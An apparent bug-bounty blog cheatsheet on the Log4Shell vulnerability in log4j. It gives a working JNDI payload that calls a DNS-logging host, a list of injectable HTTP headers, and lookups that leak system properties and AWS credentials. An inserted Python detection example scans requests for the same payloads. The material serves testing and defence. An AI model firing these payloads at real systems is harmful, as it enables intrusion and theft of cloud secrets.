Anton

Log4j Vulnerability Cheatsheet

Description

The Java logging library log4j has an unauthenticated RCE vulnerability (CVE-2021-44228) that is triggered when a user-controlled string is logged.

Affected versions: Apache log4j 2.0-beta9 through 2.14.1

How It Works

A specially crafted payload is injected into headers, input fields, or query/body parameters:

https://target.com/?test=${jndi:ldap://jv-${sys:java.version}-hn-${hostName}.qwe3er.dnslog.cn/exp}
  1. You can use a service such as dnslog.cn to create a DNS subdomain for the test. Example: qwe3er.dnslog.cn

  2. Use this subdomain to craft the payload and send it with the request. After some time, check the DNS service for incoming requests to confirm a successful callback.

  3. You should see a request similar to this one at the DNS service (containing the hostname and Java version): jv-11.0.13-hn-73a957d15746.qwe3er.dnslog.cn

Test Environments

You can use the provided test environments to inspect the behavior of this vulnerability.

Challenges & Labs (Rooms)

You can use the created challenges and labs (rooms) for practice.

How To Identify (Services)

Use these websites to create a DNS address (token) for the payload.

How To Identify (Scanners)

Use these scanners to check whether the target website is vulnerable.

List of Places where Payload can be Injected

Email header, Username, Password, Email address, Filename, Query/Body, File content, Document/Image EXIF, or inside any of these headers:

Authorization
Cache-Control
Cf-Connecting_ip
Client-Ip
Contact
Cookie
Forwarded-For-Ip
Forwarded-For
Forwarded
If-Modified-Since
Originating-Ip
Referer
True-Client-Ip
User-Agent
X-Api-Version
X-Client-Ip
X-Forwarded-For
X-Leakix
X-Originating-Ip
X-Real-Ip
X-Remote-Addr
X-Remote-Ip
X-Wap-Profile
Authorization: Basic
Authorization: Bearer
Authorization: Oauth
Authorization: Token

What Information can be Extracted

${hostName}
${sys:user.name}
${sys:user.home}
${sys:user.dir}
${sys:java.home}
${sys:java.vendor}
${sys:java.version}
${sys:java.vendor.url}
${sys:java.vm.version}
${sys:java.vm.vendor}
${sys:java.vm.name}
${sys:os.name}
${sys:os.arch}
${sys:os.version}
${env:JAVA_VERSION}
${env:AWS_SECRET_ACCESS_KEY}
${env:AWS_SESSION_TOKEN}
${env:AWS_SHARED_CREDENTIALS_FILE}
${env:AWS_WEB_IDENTITY_TOKEN_FILE}
${env:AWS_PROFILE}
${env:AWS_CONFIG_FILE}
${env:AWS_ACCESS_KEY_ID}
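As an added detection example (not code from the original post), the following Python scans a raw HTTP request for the `${jndi:` trigger across the request line and the headers listed above, and pulls out the nested `${sys:...}`, `${env:...}` and `${hostName}` lookups such a payload would leak. The sample request, the `.invalid` callback host and the function names are constructed for this example.

```python
import re
from typing import Dict, List

# The JNDI trigger, plus the ${sys:...}, ${env:...} and ${hostName} lookups
# from the list above that a callback hostname would carry out of the host.
JNDI_RE = re.compile(r"\$\{\s*jndi\s*:", re.IGNORECASE)
LOOKUP_RE = re.compile(r"\$\{(?:sys|env):[^}]*\}|\$\{hostName\}", re.IGNORECASE)

# Headers from the injection-point list above, lowercased for comparison.
LISTED_HEADERS = {
    "authorization", "cache-control", "cf-connecting_ip", "client-ip", "contact",
    "cookie", "forwarded-for-ip", "forwarded-for", "forwarded", "if-modified-since",
    "originating-ip", "referer", "true-client-ip", "user-agent", "x-api-version",
    "x-client-ip", "x-forwarded-for", "x-leakix", "x-originating-ip", "x-real-ip",
    "x-remote-addr", "x-remote-ip", "x-wap-profile",
}

# Constructed sample request: the query-string payload from this post plus a
# second lookup hidden in User-Agent. ".invalid" hosts never resolve.
SAMPLE_REQUEST = (
    "GET /?test=${jndi:ldap://jv-${sys:java.version}-hn-${hostName}.callback.invalid/exp} HTTP/1.1\r\n"
    "Host: app.example\r\n"
    "User-Agent: ${jndi:ldap://${env:AWS_SECRET_ACCESS_KEY}.callback.invalid/a}\r\n"
    "X-Forwarded-For: 203.0.113.5\r\n"
    "Accept: */*\r\n"
)

def parse_request(raw: str) -> Dict[str, str]:
    """Split a raw HTTP request into the request line and its headers."""
    lines = raw.strip().splitlines()
    fields = {"request-line": lines[0]}
    for line in lines[1:]:
        if ":" in line:
            name, value = line.split(":", 1)
            fields[name.strip().lower()] = value.strip()
    return fields

def find_log4shell_indicators(raw: str) -> List[dict]:
    """One finding per field containing a JNDI lookup, with the nested lookups
    it would exfiltrate and whether the field is on the cheatsheet's list."""
    findings = []
    for field, value in parse_request(raw).items():
        if JNDI_RE.search(value):
            findings.append({
                "field": field,
                "leaked_lookups": LOOKUP_RE.findall(value),
                "listed_injection_point": field in LISTED_HEADERS,
            })
    return findings
```

Feeding real access logs or a WAF's captured requests through `find_log4shell_indicators` flags both the query-string and header variants, and the `leaked_lookups` list shows which system properties or environment variables the callback would have disclosed.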

Video Edition is available on

Static Version Shared On


That's all for now

  1. Share the word about this article
  2. Follow me @therceman

I tweet & write about Bug Bounty Hunting
Cheers, Happy Hunting 👍
